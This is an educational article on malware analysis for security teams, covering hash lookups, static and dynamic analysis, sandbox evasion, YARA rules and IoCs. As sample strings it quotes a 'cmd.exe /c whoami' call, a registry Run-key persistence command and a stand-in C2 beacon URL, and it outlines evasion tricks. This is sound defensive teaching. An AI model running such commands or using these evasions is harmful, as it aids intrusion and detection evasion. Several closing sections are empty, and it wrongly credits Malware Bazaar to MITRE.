Your EDR flagged a file. Or your email gateway quarantined an attachment. Or someone in accounting said “I clicked the thing and now my computer is acting weird.” You’ve got a suspicious binary and a decision to make: is this a known commodity threat you can look up in a database and move on, or is it something new, custom, targeted at your organization specifically? The answer determines whether you spend five minutes or five days on it. Malware analysis is the discipline of taking a hostile program apart to understand what it does, how it does it, who might have written it, and what you need to do about it. It ranges from a quick hash lookup to weeks of reverse engineering, and knowing when to apply which level of analysis is itself a skill.

The TLDR

Malware analysis is the process of examining malicious software to understand its behavior, capabilities, origin, and impact. It operates on a spectrum from basic (automated hash lookups and string extraction) to advanced (manual reverse engineering in a disassembler). Static analysis examines the malware without executing it — looking at the code, metadata, and structure. Dynamic analysis runs it in a controlled environment and watches what it does. Each approach reveals different things. Static tells you what the malware can do. Dynamic tells you what it actually does in a given environment. Together, they give you the indicators of compromise (IoCs) and behavioral signatures you need to detect, contain, and eradicate the threat — and to write detections that catch the next variant.

The Reality

Most security teams don’t do deep malware analysis. They don’t need to for every sample. The vast majority of malware encountered in the wild is commodity — known families with known behaviors that have been analyzed thousands of times. Your EDR vendor’s threat intelligence team already did the work. Look up the hash on VirusTotal, confirm the classification, follow the established response playbook, and move on. That’s the right call 90% of the time.

The other 10% is where it matters. A targeted attack using custom malware won’t match any signature. VirusTotal will return 0/70 detections. Your EDR won’t flag it because nobody has ever seen it before. That’s when you need the capability — or a partner who has it — to take the sample apart and figure out what you’re dealing with.

The stakes are concrete. Without analysis, you don’t know what the malware does, which means you don’t know the full scope of compromise. Did it exfiltrate data? Did it establish persistence? Did it move laterally? Did it deploy additional payloads? You can wipe and rebuild the affected system, but if you don’t understand the malware’s capabilities, you don’t know if wiping one system is sufficient or if the entire domain is compromised.

MITRE ATT&CK maps malware capabilities to adversary techniques. When your analysis reveals that a sample performs credential dumping (T1003), establishes persistence via scheduled tasks (T1053), and communicates via HTTPS to a hardcoded C2 server (T1071.001), you can map those to ATT&CK and immediately scope the investigation: what other systems show evidence of these techniques?

How It Works

The Analysis Spectrum

Malware analysis isn’t one activity — it’s a spectrum of depth, and you choose the level based on what you need to know and how much time you have.

Level 1 — Automated/Hash-Based. Compute the file hash (MD5, SHA-256) and look it up. VirusTotal aggregates scan results from 70+ antivirus engines. MITRE’s Malware Bazaar and CISA’s Automated Indicator Sharing (AIS) provide additional context. If the hash is known, you get the malware family, known capabilities, IoCs, and often detailed analysis reports. Five minutes, done. But if the hash is unknown — and targeted malware will be — you need to go deeper.

Level 2 — Basic Static Analysis. Examine the file without running it. Extract strings, check PE headers (for Windows executables), look at imported functions, examine metadata, check for obfuscation. This gives you a preliminary understanding of capabilities without risk of infection. Thirty minutes to a few hours.

Level 3 — Basic Dynamic Analysis. Run the malware in a sandbox and observe its behavior. What processes does it spawn? What files does it create or modify? What registry keys does it touch? What network connections does it make? This shows you what the malware actually does when executed. A few hours.

Level 4 — Advanced Static Analysis (Reverse Engineering). Load the binary into a disassembler or decompiler (IDA Pro, Ghidra, Binary Ninja) and read the code. Understand the logic, identify encryption algorithms, reverse-engineer the C2 protocol, find the configuration data. This is where you learn how the malware works at a fundamental level. Days to weeks, requires specialized skills.

Level 5 — Advanced Dynamic Analysis. Step through the malware in a debugger, defeating anti-analysis protections, unpacking runtime packers, decrypting communication in real-time. Combined with Level 4, this produces the most complete understanding of the sample. Often performed by dedicated malware research teams or intelligence agencies.

Static Analysis Techniques

Static analysis examines the malware at rest — never executing it, never giving it a chance to do its thing.

File hashing. SHA-256 and MD5 hashes provide unique identifiers. But hashes are fragile — change a single byte and the hash changes. Attackers trivially modify their binaries to produce new hashes while preserving functionality. That’s why hashes sit at the bottom of David Bianco’s Pyramid of Pain.

Strings extraction. The strings command (or FLOSS for obfuscated strings) pulls human-readable text from a binary. You’ll find URLs, file paths, registry keys, error messages, command-and-control domains, and sometimes hardcoded credentials or encryption keys. A sample that contains strings like cmd.exe /c whoami, reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run, and https://c2server.evil/beacon just told you a lot about itself without ever running.

PE header analysis. Windows Portable Executable headers contain metadata: compilation timestamp, imported libraries (DLLs), exported functions, section names, and flags. A binary that imports VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread from kernel32.dll is probably performing process injection (MITRE T1055). Tools like PE-bear, pestudio, and CFF Explorer make this analysis straightforward.

Import table analysis. The functions a binary imports tell you what it’s designed to do. Networking functions (WSAStartup, connect, send) mean network communication. Cryptographic functions (CryptEncrypt, CryptDecrypt) suggest data encryption or ransomware behavior. Keylogging functions (GetAsyncKeyState, SetWindowsHookEx) indicate keylogger capability.

Entropy analysis. Encrypted or compressed sections have high entropy (close to 8.0 for a byte-level measurement). A PE file where the .text section has entropy of 7.9 is almost certainly packed — the real code is compressed or encrypted and will unpack itself at runtime. High entropy is a red flag that static analysis alone won’t reveal the full picture.

Fuzzy hashing (ssdeep). Unlike cryptographic hashes, fuzzy hashes measure similarity. Two malware variants from the same family — same codebase with minor modifications — will have similar ssdeep hashes even though their SHA-256 hashes are completely different. This lets you link samples to known families even after modifications.

Dynamic Analysis Techniques

Dynamic analysis runs the malware and watches what happens. This requires isolation — you never want malware executing on a production network.

Sandbox execution. Automated sandbox platforms — Cuckoo Sandbox (open source), ANY.RUN (interactive), Joe Sandbox (commercial), and Hybrid Analysis (free) — execute malware in instrumented virtual machines and capture everything: process creation, file system changes, registry modifications, network traffic, API calls, and screenshots. The output is a behavioral report that shows exactly what the malware did.

Network analysis. Capture all network traffic the malware generates. What domains does it resolve? What IPs does it contact? What protocol does it use? What data does it send? Tools like Wireshark and tcpdump capture the packets. FakeNet-NG can simulate network services so the malware thinks it’s talking to the real internet while you capture everything locally.

API monitoring. Hook the system APIs and log every call the malware makes. This is the most detailed view of runtime behavior — every file operation, every registry access, every network connection, every process manipulation. Tools like API Monitor and Process Monitor (Sysinternals) provide this visibility.

Behavioral signatures. After dynamic analysis, you can describe the malware’s behavior in terms that don’t depend on specific hashes or strings. “Creates a scheduled task named ‘SystemUpdater’ that runs a PowerShell command at startup.” That behavioral signature catches every variant, even if the hash and the C2 domain change.

Anti-Analysis Techniques

Malware authors know about analysis tools and build countermeasures.

Packing and obfuscation. Compress or encrypt the malware payload so static analysis reveals nothing useful. At runtime, a stub unpacks the real code into memory and executes it. UPX is the simplest packer. Custom packers can be extremely difficult to defeat.

VM detection. Check for artifacts that indicate a virtual machine — specific MAC address prefixes (VMware, VirtualBox), registry keys, running processes (vmtoolsd.exe), hardware identifiers. If detected, the malware exits cleanly or behaves innocently. MITRE T1497 (Virtualization/Sandbox Evasion).

Timing checks. Measure execution time for operations. If they’re suspiciously fast (as they would be in a sandbox accelerating time), assume analysis and abort. Or sleep for extended periods to outlast sandbox timeout limits. If the sandbox only runs for five minutes and the malware sleeps for six, the behavioral report shows nothing.

Environment keying. Only execute the payload if specific conditions are met — a particular hostname, domain membership, installed software, or geographic location. The sample runs benignly in a sandbox but activates its payload only on the intended target. This is increasingly common in targeted attacks.

Anti-debugging. Detect debugger presence via API calls (IsDebuggerPresent), timing anomalies, or hardware breakpoint detection. When a debugger is detected, crash, exit, or execute a decoy code path.

YARA Rules

YARA is the pattern-matching language for malware analysis. YARA rules describe patterns — strings, byte sequences, conditions — that identify malware families, behaviors, or characteristics.

A YARA rule might match on a specific string embedded in a malware family’s code, a particular byte sequence in the encryption routine, or structural characteristics like “PE file with exactly two sections, both with high entropy.” The YARA community rules and Awesome YARA repositories provide thousands of pre-written rules.

YARA rules are deployed in two ways: retroactive scanning (scan your file stores and endpoints for files matching a rule) and real-time scanning (integrate with email gateways, EDR, and SIEM to flag files matching a rule as they arrive). When your analysis of a new sample produces a YARA rule, deploying that rule immediately extends detection to your entire environment.

Indicators of Compromise (IoCs)

The operational output of malware analysis is a set of IoCs — observable artifacts that indicate the presence of the malware:

IoCs are shared through threat intelligence platforms (MISP, OpenCTI), ISACs, and public feeds like CISA AIS and AlienVault OTX. Sharing IoCs from your analysis helps the entire community detect the same threat.

Malware Families and Classification

Malware isn’t random. It’s organized into families that share code, techniques, and infrastructure. Understanding the family tells you a lot without analyzing every sample from scratch.

Major categories: ransomware (encrypts files for payment), RATs (remote access trojans for persistent control), stealers (credential and data theft), loaders (deliver other malware), wipers (destructive, data destruction), rootkits (kernel-level persistence and hiding), and botnets (coordinated network of compromised systems).

Attribution — linking malware to specific threat actors — uses code similarities, infrastructure overlap, victimology, and operational patterns. MITRE ATT&CK Groups documents known threat groups and their associated malware families. Attribution is difficult, often uncertain, and sometimes deliberately misleading (false flag operations), but it provides valuable context for understanding the threat.

How It Gets Exploited

Polymorphic and metamorphic malware. Malware that changes its code with each infection — new encryption keys, different variable names, restructured logic — to evade signature-based detection. Each copy has a different hash, different strings, and different byte patterns. Static signatures can’t keep up. This is why behavioral detection matters.

Fileless malware. Code that never writes to disk — it runs entirely in memory, injected into legitimate processes, leveraging PowerShell, WMI, or .NET in-memory execution. No file to hash, no file to scan, no file to submit to a sandbox. Detection requires memory forensics or behavioral monitoring of process execution.

Supply chain implants. Malicious code embedded in legitimate software updates, open-source libraries, or build tools. The binary passes every reputation check because it IS the legitimate software — with a few extra functions added. SolarWinds, Codecov, and the XZ Utils backdoor (CVE-2024-3094) demonstrated this attack vector at scale.

Living-off-the-land binaries. Not traditional malware at all — adversaries chain together legitimate Windows tools (PowerShell, certutil, mshta, regsvr32) to achieve malicious objectives without dropping a malware binary. There’s nothing to analyze because there’s no malware. The attack lives in command-line arguments and execution chains. The LOLBAS project catalogs these techniques.

What You Can Do

Related Deep Dives

Sources & Further Reading